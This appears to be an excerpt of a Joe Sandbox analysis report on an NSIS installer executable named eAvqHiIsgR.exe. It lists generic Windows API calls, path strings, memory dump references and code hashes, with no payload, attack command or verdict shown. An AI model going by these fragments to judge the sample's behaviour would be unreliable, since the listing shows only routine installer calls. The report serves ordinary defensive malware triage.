                                                                • API ID: ItemTextlstrlenwsprintf
                                                                • String ID: %u.%u%s%s
                                                                • API String ID: 3540041739-3551169577
                                                                • Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                                • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                                • Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                                • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                                APIs
                                                                • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403335,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403335,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                                • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                                Strings
                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405A8F
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CharPrevlstrcatlstrlen
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                • API String ID: 2659869361-2382934351
                                                                • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                                • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                                • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                                APIs
                                                                • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                                • GetTickCount.KERNEL32 ref: 00402E6E
                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                • String ID:
                                                                • API String ID: 2102729457-0
                                                                • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                                • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                                • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                                APIs
                                                                  • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,sprjtelakeringer Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                  • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                  • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                  • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                                • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,771B3410,C:\Users\user~1\AppData\Local\Temp\), ref: 00405BE0
                                                                Strings
                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B7D
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                • API String ID: 3248276644-2382934351
                                                                • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                                • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                                • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 004051C1
                                                                • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                                  • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Window$CallMessageProcSendVisible
                                                                • String ID:
                                                                • API String ID: 3748168415-3916222277
                                                                • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                                • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,771B3410,00000000,C:\Users\user~1\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                                • GlobalFree.KERNEL32(004EBB00), ref: 00403896
                                                                Strings
                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403875
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Free$GlobalLibrary
                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                • API String ID: 1100898210-2382934351
                                                                • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                                • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                                APIs
                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\eAvqHiIsgR.exe,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405ADC
                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\eAvqHiIsgR.exe,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405AEA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: CharPrevlstrlen
                                                                • String ID: C:\Users\user\Desktop
                                                                • API String ID: 2709904686-3976562730
                                                                • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                                • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 701A115B
                                                                • GlobalFree.KERNEL32(00000000), ref: 701A11B4
                                                                • GlobalFree.KERNEL32(?), ref: 701A11C7
                                                                • GlobalFree.KERNEL32(?), ref: 701A11F5
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2965840144.00000000701A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 701A0000, based on PE: true
                                                                • Associated: 00000005.00000002.2965760512.00000000701A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965858277.00000000701A3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965878197.00000000701A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_701a0000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc
                                                                • String ID:
                                                                • API String ID: 1780285237-0
                                                                • Opcode ID: cfda4b83430542c03f2a79b5338db6c2d0eed32e03a3f67637e7157e54025028
                                                                • Instruction ID: e9fb8a53efa59c2db48b5a5b55ed9b594a6aa2f62992dbf273ef1ad4b6ce36ad
                                                                • Opcode Fuzzy Hash: cfda4b83430542c03f2a79b5338db6c2d0eed32e03a3f67637e7157e54025028
                                                                • Instruction Fuzzy Hash: 8E31AFFA504244AFD7018F75DE49B6E7FF9FB45250B36452AFA46C2B20DB74E8009B20
                                                                APIs
                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                                • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                • String ID:
                                                                • API String ID: 190613189-0
                                                                • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                                • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8